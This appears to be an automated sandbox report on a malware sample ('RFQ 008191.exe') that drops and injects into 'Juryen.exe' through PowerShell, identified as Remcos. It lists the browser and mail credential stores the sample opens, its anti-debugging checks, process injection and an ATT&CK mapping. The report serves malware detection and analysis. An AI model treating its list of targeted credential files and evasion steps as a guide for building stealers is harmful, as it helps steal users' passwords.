              Source: C:\Users\user\Desktop\RFQ 008191.exe Code function: 0_2_0040689E FindFirstFileW,FindClose
              Source: C:\Users\user\Desktop\RFQ 008191.exe Code function: 0_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
              Source: C:\Users\user\Desktop\RFQ 008191.exe Code function: 0_2_00402930 FindFirstFileW
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe Code function: 11_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe Code function: 11_2_00402930 FindFirstFileW
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe Code function: 11_2_0040689E FindFirstFileW,FindClose
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe Code function: 11_2_1F7510F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe Code function: 11_2_1F756580 FindFirstFileExA
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe Code function: 13_2_0040AE51 FindFirstFileW,FindNextFileW
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe Code function: 14_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe Code function: 15_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe Code function: 13_2_00418981 memset,GetSystemInfo
              Source: ModuleAnalysisCache.6.dr Binary or memory string: Remove-NetEventVmNetworkAdapter
              Source: powershell.exe, 00000006.00000002.1762545128.0000000005225000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter@\
              Source: ModuleAnalysisCache.6.dr Binary or memory string: Add-NetEventVmNetworkAdapter
              Source: powershell.exe, 00000006.00000002.1762545128.0000000005225000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter@\
              Source: powershell.exe, 00000006.00000002.1762545128.0000000005225000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter@\
              Source: Juryen.exe, 0000000B.00000002.2528307519.0000000002E58000.00000004.00000020.00020000.00000000.sdmp, Juryen.exe, 0000000B.00000002.2528307519.0000000002EAE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
              Source: ModuleAnalysisCache.6.dr Binary or memory string: Get-NetEventVmNetworkAdapter
              Source: C:\Users\user\Desktop\RFQ 008191.exe API call chain: ExitProcess graph end node graph_0-3714
              Source: C:\Users\user\Desktop\RFQ 008191.exe API call chain: ExitProcess graph end node graph_0-3722
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe API call chain: ExitProcess graph end node graph_14-34109
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe Process queried: DebugPort
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe Code function: 11_2_1F752639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe Code function: 13_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe Code function: 11_2_1F754AB4 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe Code function: 11_2_1F75724E GetProcessHeap
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe Process token adjusted: Debug
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe Code function: 11_2_1F752B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe Code function: 11_2_1F7560E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created / APC Queued / Resumed: C:\Users\user\AppData\Local\Temp\Juryen.exe
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\Juryen.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\Juryen.exe protection: execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\Juryen.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread APC queued: target process: C:\Users\user\AppData\Local\Temp\Juryen.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Users\user\AppData\Local\Temp\Juryen.exe base: 16D0000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\Juryen.exe "C:\Users\user~1\AppData\Local\Temp\Juryen.exe"
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe Process created: C:\Users\user\AppData\Local\Temp\Juryen.exe C:\Users\user~1\AppData\Local\Temp\Juryen.exe /stext "C:\Users\user\AppData\Local\Temp\dcokdpgzihxxnj"
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe Process created: C:\Users\user\AppData\Local\Temp\Juryen.exe C:\Users\user~1\AppData\Local\Temp\Juryen.exe /stext "C:\Users\user\AppData\Local\Temp\owccehyavpqcxpshx"
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe Process created: C:\Users\user\AppData\Local\Temp\Juryen.exe C:\Users\user~1\AppData\Local\Temp\Juryen.exe /stext "C:\Users\user\AppData\Local\Temp\yyhnfajurxihaeglgsaa"
              Source: Juryen.exe, 0000000B.00000002.2528307519.0000000002EAE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager04\d
              Source: Juryen.exe, 0000000B.00000002.2528307519.0000000002ED2000.00000004.00000020.00020000.00000000.sdmp, Juryen.exe, 0000000B.00000002.2528307519.0000000002EAE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
              Source: Juryen.exe, 0000000B.00000002.2528307519.0000000002EAE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager04\
              Source: Juryen.exe, 0000000B.00000002.2528307519.0000000002EAE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager04\f1
              Source: Juryen.exe, 0000000B.00000002.2528307519.0000000002ED2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerS"
              Source: Juryen.exe, 0000000B.00000002.2528307519.0000000002EAE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager04\*
              Source: Juryen.exe, 0000000B.00000002.2528307519.0000000002EAE000.00000004.00000020.00020000.00000000.sdmp, Juryen.exe, 0000000B.00000002.2528307519.0000000002E96000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
              Source: Juryen.exe, 0000000B.00000002.2528307519.0000000002ED2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerI"
              Source: Juryen.exe, 0000000B.00000002.2528307519.0000000002EAE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager04\k
              Source: Juryen.exe, 0000000B.00000002.2528307519.0000000002EAE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager04\m
              Source: Juryen.exe, 0000000B.00000002.2528307519.0000000002E96000.00000004.00000020.00020000.00000000.sdmp, logs.dat.11.dr Binary or memory string: [Program Manager]
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exe Code function: 11_2_1F752933 cpuid
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 11_2_1F752264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,11_2_1F752264
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 14_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,14_2_004082CD
              Source: C:\Users\user\Desktop\RFQ 008191.exeCode function: 0_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040351C
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
Source: Yara match | File source: 0000000B.00000002.2512739628.000000000019F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2528307519.0000000002EAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2528307519.0000000002E96000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Juryen.exe PID: 7864, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Key opened: HKEY_CURRENT_USER\Software\Paltalk
Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: ESMTPPassword 14_2_004033F0
Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 14_2_00402DB3
Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 14_2_00402DB3
Source: Yara match | File source: Process Memory Space: Juryen.exe PID: 7864, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Juryen.exe PID: 8032, type: MEMORYSTR

Remote Access Functionality

Source: C:\Users\user\AppData\Local\Temp\Juryen.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-HSAM04
Source: Yara match | File source: 0000000B.00000002.2512739628.000000000019F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2528307519.0000000002EAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2528307519.0000000002E96000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Juryen.exe PID: 7864, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
MITRE ATT&CK Matrix (flattened table rebuilt as one list per tactic; the digits in square brackets are the signature-count badges shown next to a technique in the matrix, reproduced as extracted, so adjacent badges appear run together, e.g. [412])

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology

Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application

Execution: Windows Management Instrumentation [1]; Native API [11]; Command and Scripting Interpreter [2]; PowerShell [2]; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter

Persistence: DLL Side-Loading [1]; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At

Privilege Escalation: DLL Side-Loading [1]; Access Token Manipulation [1]; Process Injection [412]; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At

Defense Evasion: Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [2]; Software Packing [2]; DLL Side-Loading [1]; Masquerading [1]; Virtualization/Sandbox Evasion [31]; Access Token Manipulation [1]; Process Injection [412]; HTML Smuggling

Credential Access: OS Credential Dumping [1]; Input Capture [11]; Credentials in Registry [2]; Credentials In Files [1]; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow

Discovery: System Time Discovery [1]; Account Discovery [1]; File and Directory Discovery [2]; System Information Discovery [129]; Security Software Discovery [241]; Virtualization/Sandbox Evasion [31]; Process Discovery [4]; Application Window Discovery [1]; System Owner/User Discovery [1]

Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections

Collection: Archive Collected Data [1]; Data from Local System [1]; Email Collection [1]; Input Capture [11]; Clipboard Data [2]; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged

Command and Control: Ingress Tool Transfer [1]; Encrypted Channel [2]; Non-Standard Port [1]; Remote Access Software [1]; Non-Application Layer Protocol [2]; Application Layer Protocol [112]; Commonly Used Port; Application Layer Protocol; Web Protocols

Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol

Impact: System Shutdown/Reboot [1]; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
Behavior Graph ID: 1572498 | Sample: RFQ 008191.exe | Start date: 10/12/2024 | Architecture: WINDOWS | Score: 100

Behavior graph, rebuilt from the flattened graph text as a process tree (numbers in square brackets are the per-node counters from the graph, i.e. created files / registry values as in the legend above):

• Sample level: DNS/IP: geoplugin.net; signatures: Suricata IDS alerts for network traffic; Found malware configuration; Multi AV Scanner detection for submitted file; 10 other signatures
• RFQ 008191.exe [23] started
  • signature: Suspicious powershell command line found
  • powershell.exe [29] started
    • dropped: C:\Users\user\AppData\Local\Temp\Juryen.exe (PE32); C:\Users\user\...\Juryen.exe:Zone.Identifier (ASCII)
